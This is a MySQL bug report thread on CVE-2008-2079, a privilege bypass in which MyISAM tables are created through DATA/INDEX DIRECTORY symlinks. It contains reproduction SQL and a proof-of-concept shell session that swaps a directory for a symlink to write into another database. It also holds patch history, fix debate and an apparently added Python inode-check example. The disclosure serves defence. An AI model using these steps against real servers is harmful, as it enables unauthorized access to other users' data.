Bug #32167 another privilege bypass with DATA/INDEX DIRECTORY
Submitted: 7 Nov 2007 18:42    Modified: 12 Mar 2010 17:53
Reporter: Sergei Golubchik
Status: Closed
Category: MySQL Server: MyISAM storage engine    Severity: S3 (Non-critical)
Version: any    OS: Any
Assigned to: Georgi Kodinov    CPU Architecture: Any
Tags: Security
Triage: D2 (Serious)

[7 Nov 2007 18:42] Sergei Golubchik
Description:
When one creates a MyISAM table with

   CREATE TABLE ( ) DATA DIRECTORY ... INDEX DIRECTORY ...

there're special checks to ensure that existing tables are not overwritten via symlinks. That is, one cannot create a 'user' table in the 'test' db, with DATA DIRECTORY pointing to 'mysql' db.

When one creates a table without symlinks, existing files are overwritten. It is intentional too.

But it creates a problem similar to "insecure tempfile creation" - an attacker can create a table with MYD/MYI files in another database, and if another user will later create a table in that database with the same name, the attacker will be able to access the table bypassing privilege checks.

How to repeat:
root> grant all privileges on test.* to test@localhost;

test> create table t1 (a int) data directory '/MySQL/var/mysql', index directory '/MySQL/var/mysql';

root> flush tables;
root> create table t1 (a int);
root> insert t1 values (1),(2),(3);
root> flush tables;

test> select * from t1;

Suggested fix:
don't allow symlinks into datadir
[22 Nov 2007 14:04] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/38278

ChangeSet@1.2198, 2007-11-22 17:59:11+04:00, gluh@mysql.com +3 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Use of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[27 Nov 2007 12:45] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/38623

ChangeSet@1.2198, 2007-11-27 16:39:47+04:00, gluh@mysql.com +3 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Use of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[28 Nov 2007 9:58] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/38680

ChangeSet@1.2198, 2007-11-28 13:53:01+04:00, gluh@mysql.com +3 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY (2nd version)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Use of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[28 Nov 2007 15:08] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/38704

ChangeSet@1.2198, 2007-11-28 19:02:52+04:00, gluh@mysql.com +3 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY (3rd version)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Use of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[30 Nov 2007 8:17] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/38932

ChangeSet@1.2198, 2007-11-30 12:11:33+04:00, gluh@mysql.com +3 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY (3rd version)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Use of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[30 Nov 2007 9:20] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/38937

ChangeSet@1.2198, 2007-11-30 13:14:47+04:00, gluh@mysql.com +5 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Use of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[30 Nov 2007 12:00] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/38952

ChangeSet@1.2218, 2007-11-30 15:54:55+04:00, gluh@mysql.com +5 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Use of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[30 Nov 2007 14:16] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/38966

ChangeSet@1.2592, 2007-11-30 18:10:36+04:00, gluh@mysql.com +2 -0
  bug29325 test case is removed because of Bug#32167 fix
[30 Nov 2007 14:44] Sergei Golubchik
partitioning isn't covered by the first fix
[7 Dec 2007 11:19] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/39513

ChangeSet@1.2679, 2007-12-07 15:14:52+04:00, gluh@mysql.com +8 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY (version for 5.1)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Use of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[18 Dec 2007 12:53] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/40134

ChangeSet@1.2679, 2007-12-18 16:48:12+04:00, gluh@mysql.com +13 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY (2nd version for 5.1)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Use of 'mysql data home'/'any db name' in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[4 Feb 2008 12:15] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/41636

ChangeSet@1.2679, 2008-02-04 16:09:35+04:00, gluh@mysql.com +13 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY (3rd version for 5.1)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Use of 'mysql data home'/'any db name' in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[28 Feb 2008 12:54] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/43143

ChangeSet@1.2573, 2008-02-28 16:46:52+04:00, gluh@mysql.com +13 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY (3rd version for 5.1)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Use of 'mysql data home'/'any db name' in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[29 Feb 2008 9:01] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/43198

ChangeSet@1.2574, 2008-02-29 12:52:50+04:00, gluh@mysql.com +5 -0
  additional test fix for Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY
[29 Feb 2008 10:03] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/43206

ChangeSet@1.2707, 2008-02-29 13:55:00+04:00, gluh@mysql.com +5 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY (ver 4.1,5.0)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Use of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[13 Mar 2008 19:29] Bugs System
Pushed into 6.0.5-alpha
[13 Mar 2008 19:36] Bugs System
Pushed into 5.1.24-rc
[13 Mar 2008 19:43] Bugs System
Pushed into 5.0.60
[13 Mar 2008 19:43] Bugs System
Pushed into 4.1.24
[15 Mar 2008 11:29] Jon Stephens
Documented bugfix in the 4.1.24, 5.0.60, 5.1.24, and 6.0.5 changelogs as follows:

        It was possible to circumvent privileges through the creation of
        MyISAM tables employing the DATA DIRECTORY and INDEX DIRECTORY
        options to overwrite existing table files in the MySQL data
        directory. Use of the MySQL data directory in DATA DIRECTORY and
        INDEX DIRECTORY is now disallowed.

In addition, the changelog entries for 5.1.24 and 6.0.5 include the statement:

        This is also true for partitioned tables and individual table
        partitions.

Also added a note to the relevant section of the CREATE TABLE Syntax section in the 4.1/5.0/5.1/6.0 Manuals.
[31 Mar 2008 14:34] Jon Stephens
Also noted in the 5.1.23-ndb-6.3.11 changelog.
[6 May 2008 9:16] Sergei Golubchik
please, note in the manual that it's CVE-2008-2079
[9 May 2008 12:05] Norbert Tretkowski
I'm missing the patch for 5.0. There was one commit into the 5.0 repository, but it only removed a test case.
[9 May 2008 12:43] Sergei Golubchik
It was merged from 4.1. Note that 5.1 required a new fix only because of a new feature - partitioning, not because we do a separate patch for every branch.

When I'm looking in my 5.0 tree this is what I see:

% bk changes -/#32167/
ChangeSet@1.1616.3128.2, 2008-02-29 13:55:00+04:00, gluh@mysql.com +5 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECORY(ver 4.1,5.0)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Using of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.

So, that's the patch that got into 5.0
[9 May 2008 13:04] Norbert Tretkowski
Ah, I missed the comment about the MySQL version, thanks for the pointer.
[9 May 2008 15:20] Norbert Tretkowski
The patch does not apply on the current Community Edition release 5.0.51b.
[9 May 2008 16:23] Paul Dubois
5.0.51b precedes 5.0.60. The patch will appear in the next community release with a version higher than 5.0.60.
[9 May 2008 17:44] Norbert Tretkowski
That doesn't really help Linux distributions which are shipping the Community Edition of MySQL.
[20 May 2008 20:54] Paul Dubois
Added CVE number to changelog entry.
[7 Jul 2008 7:46] Devin Carraway
At least some of the patches attached to this bug do not appear to be sufficient to address the vulnerability.  Commit#38278 and #38623 call fn_format() with MY_RETURN_REAL_PATH but not MY_RESOLVE_SYMLINKS; this will cause my_realpath (as it appears in 5.0.51b) to rely entirely on an lstat() check to determine whether the given target is a symlink.  This is insufficient because an attacker can supply the path to a real directory underneath a symlink (e.g. /tmp/{foo -> /var/lib}/mysql) without triggering a simple lstat().

Commit #38680 and #38704 are even worse, in that besides the above problem, they then discard the output of fn_format() entirely, reusing the original input for comparison against the mysql data homedir.

Commit #38932, #38937, #38952, #39513, #40134, #41636, #43143 and #43206 are a mix of these -- they pass MY_RETURN_REAL_PATH to fn_format(), but then ignore its output.

Note that my reading of these patches is based on 5.0.51b and 5.0.32's implementations of fn_format() as a reference; I've tested that backports of #38680/38704 to these versions do not correct the vulnerability, but am only doing a visual reading of the others.
[7 Jul 2008 9:45] Sergei Golubchik
Also, the check is not sufficient. test_if_data_home_dir() should be called every time the table is opened, not only when it's created.
[13 Jul 2008 20:34] Devin Carraway
After a discussion with other members of the Debian security team, I wanted to pass on a request that you consider a non-path based solution to this issue, at least on operating systems where one is feasible.

There are two basic problems with the path-based fix to this bug employed thus far.  First and most simply, it only works to protect database users who store their data/index files under the mysql data root (whether by deliberate act or by default).  Users who store a table's files outside that path (e.g. to manage disk resources) are still vulnerable to attack.

Secondly, on many operating systems paths aren't a reliable mapping to files.  Linux, for example, supplies bind mounts, where a subset of one filesystem can be made to appear in another location.  There is no symlinking, and a realpath() called on a file in a bind mount will not return the path from the "source" filesystem.  The unionfs feature in FreeBSD, Linux and Plan9 present the same problem, and MacOS' recently-added directory hardlinks probably do as well.  Most of these cases require sysadmin/DBA intervention to bring about the preconditions for the attack, but while unusual are hardly unprecedented.

Under most conditions, the proper fix would be to create new files with O_CREAT|O_EXCL and not try to control path usage.  However, in mysql's particular case this turns an authorization check bypass weakness into a DoS weakness -- though it might be the only viable option for supporting arbitrary user-supplied paths outside the mysql data directory.  For protection within the data directory, you might consider doing inode-based checks based on device+inode number, which are stable at least across bind mounts.  Or you could make passing DATA/INDEX DIRECTORY clauses to CREATE TABLE statements a privileged operation in itself.
[14 Jul 2008 11:13] Sergei Golubchik
There's an option to create new files with O_CREAT|O_EXCL. See mysqld --help for keep_files_on_create.

I'm not sure I understand your device+inode idea - does it mean the server would need to scan all databases in the datadir to know all inode numbers of all tables ?
[14 Jul 2008 12:57] Christian Hammers
Hello Sergey

I guess this would indeed mean that MySQL would have to do a stat() call for every directory. Something like: 
find /var/lib/mysql -type d -printf "%D %i %p\n"

bye,

-christian-
[17 Jul 2008 5:35] Devin Carraway
If you're trying to protect the mysql data directory and its descendants, then you can do so with a stat() call on that directory, then on each component of the user-supplied index/data directory path (hence for /tmp/foo/bar: /tmp, /tmp/foo, /tmp/foo/bar).  If any of the supplied path's ancestors or the path itself match the mysql data dir, then the user has supplied a path in or under it.  This would not protect databases with data/index dirs outside the mysql root -- for that you'd have to check for a nonempty intersection between the inodes of the components of the user-supplied path and those of each data/index dir used by every other database within that mysqld.

There are a number of potential race conditions in such a check, though they apply equally to a path-based readlink() or realpath() check as well.  Essentially, if mysqld creates the table's data files under a user-controlled path after checking for its validity, then you're not guaranteed that the path used for the create is the same one you checked.  For an attacker trying to exploit the race condition, the odds aren't too shabby, and they can retry as many times as they like until they succeed.

Since there isn't an atomic stat-directory-and-open-file-therein system call in UNIX, to avoid the race may require an ownership-based lstat() check as well, to assure that there aren't any components of the path writable by users other than mysqld's own and root.  And the operation might need to be performed under a global lock so as to protect against races with table storage paths as well.  It sucks, but it might be the price of admission for a feature like this one.
[17 Jul 2008 7:33] Sergei Golubchik
So far we're still implementing the readlink/realpath solution.

For bind mounts, for example, we say that it's the DBA's problem - in particular, if he has made two different paths /a/b/c/d and /e/f/g/h refer to the same file, he himself needs to make sure that one of these paths is unreadable for the mysql user (the user mysqld is running as), e.g. by setting permissions on the c/ directory appropriately.

A simple solution to fix races is to check a path with realpath, and then use the *expanded*, "real" path to access the file, not the original one.
[18 Jul 2008 7:06] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/50005

2705 Alexey Botchkov	2008-07-18
      Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
      
      test_if_data_home_dir fixed to look into real path.
      Checks added to mi_open for symlinks into data home directory.
[18 Jul 2008 7:43] Devin Carraway
Sorry I didn't get to this earlier, but using realpath()'s return value won't work either if the attacker controls any of the components of the (real) path.  Here's a PoC illustrating why, using a mysqld patched to use a realpath() call.  At the time the test_if_data_home_dir() check is run, the path given involves no symlinks at all and does not refer to the mysql data dir.  But by the time the table's files are actually created, the path now includes a symlink to another database's data directory, and the files end up there.

Starting conditions were two empty databases, test1 and test2, with a user allowed to create in t1 but not in t2, and a root user that can create in t2.

First, as the test user:

[etch-amd64] aqua@kesha:/tmp
$ rm -rf directory && umask 0 && mkdir directory && ls -ld directory
drwxrwxrwx 2 aqua 1000 1024 Jul 18 07:17 directory
[etch-amd64] aqua@kesha:/tmp
$ mysql -p test1
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 6
Server version: 5.0.32-Debian_7etch6-log Debian etch distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> create table t1 (a int) data directory '/tmp/directory/' index directory '/tmp/directory/' ;
Query OK, 0 rows affected (0.04 sec)

mysql> 
[1]+  Stopped                 mysql -p test1
[etch-amd64] aqua@kesha:/tmp
$ mysql -p test1
[etch-amd64] aqua@kesha:/tmp
$ rm -rf directory && ln -s /var/lib/mysql/test2 directory && ls -ld directory
lrwxrwxrwx 1 aqua 1000 20 Jul 18 07:17 directory -> /var/lib/mysql/test2

Then, as the root user, in the test2 db:

mysql> create table t1 (a int) ;
Query OK, 0 rows affected (0.04 sec)

And as the test user, back in test1:

mysql> insert into t1 values (1),(2),(3) ;
Query OK, 3 rows affected (0.00 sec)
Records: 3  Duplicates: 0  Warnings: 0

Finally, over in test2:

mysql> select * from t1 ;
+------+
| a    |
+------+
|    1 | 
|    2 | 
|    3 | 
+------+
3 rows in set (0.00 sec)

Sorry I didn't think of that earlier.  Finally, keep in mind that realpath() isn't atomic -- it's an iteration over lstat() and readlink(); if part of it is replaced with a symlink after the iteration has passed that part, realpath() won't tell you:

00:37:31.512490 getcwd("/tmp"..., 4096) = 5 <0.000016>
00:37:31.512581 lstat("/tmp/a", {st_mode=S_IFDIR|0755, st_size=1024, ...}) = 0 <0.000019>
/* inject rename("a", "a.old"); symlink("/var/lib/mysql", "a"); */
00:37:31.512706 lstat("/tmp/a/b", {st_mode=S_IFDIR|0755, st_size=1024, ...}) = 0 <0.000017>
[18 Jul 2008 7:48] Devin Carraway
BTW, reading over that checkin, by putting a realpath check into the open call you narrow the window of vulnerability considerably -- just keep in mind that symlinks can be anywhere in a path, while lstat() only checks the last component.
[18 Jul 2008 8:44] Sergei Golubchik
Right, that's precisely why we moved the check to the place where a file is *opened*, not where it's *created* - to stop attacks like the one you described.
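Added example, not code from the bug report or the MySQL tree: the device+inode ancestor check Devin Carraway proposes, beside the literal string comparison he describes the early patches as doing, run over a constructed directory layout that mirrors the PoC's `/tmp/directory -> /var/lib/mysql/test2` symlink. The function also hands back the resolved path, as Sergei Golubchik suggests, so the caller never creates files under the unresolved user-supplied string.

```python
import os
import shutil
import tempfile


def inode_key(path):
    """Identity of a directory as (st_dev, st_ino), following symlinks the way
    the server's open() would; stable across bind mounts, unlike the path string."""
    st = os.stat(path)
    return (st.st_dev, st.st_ino)


def ancestors(path):
    """Yield an absolute path and each of its ancestors up to '/':
    /tmp/foo/bar -> /tmp/foo/bar, /tmp/foo, /tmp, /"""
    current = os.path.abspath(path)
    while True:
        yield current
        parent = os.path.dirname(current)
        if parent == current:
            return
        current = parent


def string_check_rejects(datadir, supplied):
    """The weak form: compare the literal user-supplied string against the data
    home directory. A symlink (or bind mount) under a harmless-looking prefix
    never trips this."""
    return os.path.normpath(supplied).startswith(os.path.normpath(datadir))


def inode_check(datadir, supplied):
    """Resolve the supplied path, then compare the device+inode of every
    component of the resolved path against the data directory.
    Returns (rejected, resolved): a caller that goes on to create files must use
    `resolved`, never `supplied`; even then the check is only advisory until it
    is repeated at open time, because realpath() itself is not atomic."""
    target = inode_key(datadir)
    resolved = os.path.realpath(supplied)
    for component in ancestors(resolved):
        try:
            if inode_key(component) == target:
                return True, resolved
        except FileNotFoundError:
            continue  # component not created yet; nothing to compare against
    return False, resolved


def build_fixture():
    """Constructed layout (not taken from the report): a data dir holding test2,
    and a scratch dir whose 'directory' entry is a symlink into the data dir,
    mirroring the PoC's /tmp/directory -> /var/lib/mysql/test2."""
    root = tempfile.mkdtemp(prefix="bug32167-")
    datadir = os.path.join(root, "var", "lib", "mysql")
    os.makedirs(os.path.join(datadir, "test2"))
    scratch = os.path.join(root, "tmp")
    os.mkdir(scratch)
    os.symlink(os.path.join(datadir, "test2"), os.path.join(scratch, "directory"))
    return root, datadir, scratch


def demo():
    """Run both checks over the fixture and report what each one decides."""
    root, datadir, scratch = build_fixture()
    try:
        via_symlink = os.path.join(scratch, "directory", "")  # "/tmp/directory/"
        honest = os.path.join(scratch, "elsewhere")           # outside the data dir
        direct = os.path.join(datadir, "test2")               # literally inside it
        return {
            "string_rejects_symlink": string_check_rejects(datadir, via_symlink),
            "inode_rejects_symlink": inode_check(datadir, via_symlink)[0],
            "inode_rejects_honest": inode_check(datadir, honest)[0],
            "inode_rejects_direct": inode_check(datadir, direct)[0],
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())
```

The string comparison lets the symlinked path through while the inode walk rejects it, and an unrelated path outside the data directory is still accepted.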
[18 Jul 2008 13:12] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/50036

2705 Alexey Botchkov	2008-07-18
      Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
      
      test_if_data_home_dir fixed to look into the real path.
      Checks added to mi_open for symlinks into data home directory.
[26 Jul 2008 10:53] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/50551

2705 Alexey Botchkov	2008-07-26
      Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
            
            test_if_data_home_dir fixed to look into real path.
            Checks added to mi_open for symlinks into data home directory.
      modified:
        include/my_sys.h
        include/myisam.h
        myisam/mi_check.c
        myisam/mi_open.c
        myisam/mi_static.c
        myisam/myisamchk.c
        myisam/myisamdef.h
        mysql-test/r/symlink.result
        mysys/my_symlink.c
        sql/mysql_priv.h
        sql/mysqld.cc
        sql/sql_parse.cc
      
      per-file messages:
        include/my_sys.h
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          my_is_symlink interface added
        include/myisam.h
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          myisam_test_invalid_symlink interface added
        myisam/mi_check.c
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          mi_open_datafile calls modified
        myisam/mi_open.c
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          code added to mi_open to check for symlinks into data home directory.
          mi_open_datafile now accepts 'original' file path to check if it's
          an allowed symlink.
        myisam/mi_static.c
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          myisam_test_invalid_symlink defined
        myisam/myisamchk.c
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          mi_open_datafile call modified
        myisam/myisamdef.h
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          mi_open_datafile interface modified - 'real_path' parameter added
        mysql-test/r/symlink.test
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          error codes corrected as some patch now rejected pointing inside datahome
        mysql-test/r/symlink.result
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          error messages corrected in the result
        mysys/my_symlink.c
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          my_is_symlink() implemented
          my_realpath() now returns the 'realpath' even if a file isn't a symlink
        sql/mysql_priv.h
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          test_if_data_home_dir interface
        sql/mysqld.cc
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          myisam_test_invalid_symlink set with the 'test_if_data_home_dir'
        sql/sql_parse.cc
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          error messages corrected
          test_if_data_home_dir code fixed
[31 Jul 2008 11:03] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/50773

2584 Alexey Botchkov	2008-07-31
      Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
      
          test_if_data_home_dir fixed to look into real path.
          Checks added to mi_open for symlinks into data home directory.
      
       per-file messages:
              include/my_sys.h
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                my_is_symlink interface added
      
              mysql-test/r/udf.result
                test result fixed (not related to #32167)
      
              mysys/my_symlink.c
                my_is_symlink() implemented
                my_realpath() now returns the 'realpath' even if a file isn't a symlink
[5 Aug 2008 17:40] Paul Dubois
Noted in 5.0.67 changelog.

It was possible to circumvent privileges through the creation of
MyISAM tables employing the DATA DIRECTORY and INDEX DIRECTORY 
options to overwrite existing table files in the MySQL data
directory. Use of the MySQL data directory in DATA DIRECTORY and
INDEX DIRECTORY pathname is now disallowed.

Leaving report in Patch Approved status.
[22 Aug 2008 13:43] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/52326

2672 Alexey Botchkov	2008-08-22
      Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                  
                  test_if_data_home_dir fixed to look into real path.
                  Checks added to mi_open for symlinks into data home directory.
      
      per-file messages:
              include/my_sys.h
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                my_is_symlink interface added
              include/myisam.h
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                myisam_test_invalid_symlink interface added
              myisam/mi_check.c
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                mi_open_datafile calls modified
              myisam/mi_open.c
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                code added to mi_open to check for symlinks into data home directory.
                mi_open_datafile now accepts 'original' file path to check if it's
                an allowed symlink.
              myisam/mi_static.c
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                myisam_test_invalid_symlink defined
              myisam/myisamchk.c
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                mi_open_datafile call modified
              myisam/myisamdef.h
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                mi_open_datafile interface modified - 'real_path' parameter added
              mysql-test/r/symlink.test
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                error codes corrected as some patch now rejected pointing inside datahome
              mysql-test/r/symlink.result
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                error messages corrected in the result
              mysys/my_symlink.c
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                my_is_symlink() implemented
                my_realpath() now returns the 'realpath' even if a file isn't a symlink
              sql/mysql_priv.h
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                test_if_data_home_dir interface
              sql/mysqld.cc
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                myisam_test_invalid_symlink set with the 'test_if_data_home_dir'
              sql/sql_parse.cc
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                error messages corrected
                test_if_data_home_dir code fixed
[26 Aug 2008 14:32] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/52569

2725 Mattias Jonsson	2008-08-26
      Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY
      
      post push fix
      
      Updated partition_symlink since different error behavior
      if embedded (or not partitioned)
[26 Aug 2008 18:34] Bugs System
Pushed into 5.0.70  (revid:holyfoot@mysql.com-20080822123153-ej8aa99od7gafd8f) (version source revid:davi.arnaut@sun.com-20080826182704-ikgad9sf3142e7x9) (pib:3)
[26 Aug 2008 19:11] Bugs System
Pushed into 5.1.28  (revid:mattiasj@mysql.com-20080826143130-f3soa1axcrqeqjte) (version source revid:davi.arnaut@sun.com-20080826183817-r22ie0hgagpcn6su) (pib:3)
[26 Aug 2008 19:30] Paul Dubois
Noted in 5.0.70, 5.1.28 changelogs.

Setting report to NDI pending push into 6.0.x.
[27 Aug 2008 5:27] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/52643

2729 Mattias Jonsson	2008-08-27
      Bug#32167
      
      post push fix for failing valgrind test (since code was not used in valgrind)
[28 Aug 2008 13:46] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/52849

2730 Mattias Jonsson	2008-08-28
      Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
      
      post push patch
      
      when building with valgrind, it does not compile in realpath,
      so this test fails when using a valgrind build
      NOTE: building with valgrind is not the same as using the
      --valgrind option with mysql-test-run
[28 Aug 2008 15:01] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/52854

2723 Mattias Jonsson	2008-08-28
      Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
      
      post push patch
      when building with valgrind, it does not compile in realpath,
      so this test fails when using a valgrind build
      NOTE: building with valgrind is not the same as using the
      --valgrind option with mysql-test-run
[28 Aug 2008 15:05] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/52857

2723 Mattias Jonsson	2008-08-28
      Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
      
      post push patch
      when building with valgrind, it does not compile in realpath,
      so this test fails when using a valgrind build
      NOTE: building with valgrind is not the same as using the
      --valgrind option with mysql-test-run
[13 Sep 2008 22:29] Bugs System
Pushed into 6.0.6-alpha  (revid:holyfoot@mysql.com-20080822123153-ej8aa99od7gafd8f) (version source revid:hakan@mysql.com-20080716105246-eg0utbybp122n2w9) (pib:3)
[16 Sep 2008 4:44] Paul Dubois
Noted in 6.0.6 changelog.
[26 Sep 2008 12:30] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/54543

2698 He Zhenxing	2008-09-26 [merge]
      Merge 5.1 main -> 5.1-rpl
[30 Sep 2008 13:26] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/54774

2667 He Zhenxing	2008-09-29 [merge]
      Auto Merge
[1 Oct 2008 16:07] Bugs System
Pushed into 5.1.28  (revid:mattiasj@mysql.com-20080828145922-sydhto6u4va3cb4b) (version source revid:kgeorge@mysql.com-20080828152406-25mkut4u5tocs4et) (pib:4)
[14 Oct 2008 15:13] Bugs System
Pushed into 4.1.25  (revid:holyfoot@mysql.com-20080726093931-1ubj8csfdd8jx11l) (version source revid:holyfoot@mysql.com-20080726093931-1ubj8csfdd8jx11l) (pib:4)
[23 Oct 2008 17:40] Bugs System
A patch for this bug has been committed. After review, it may
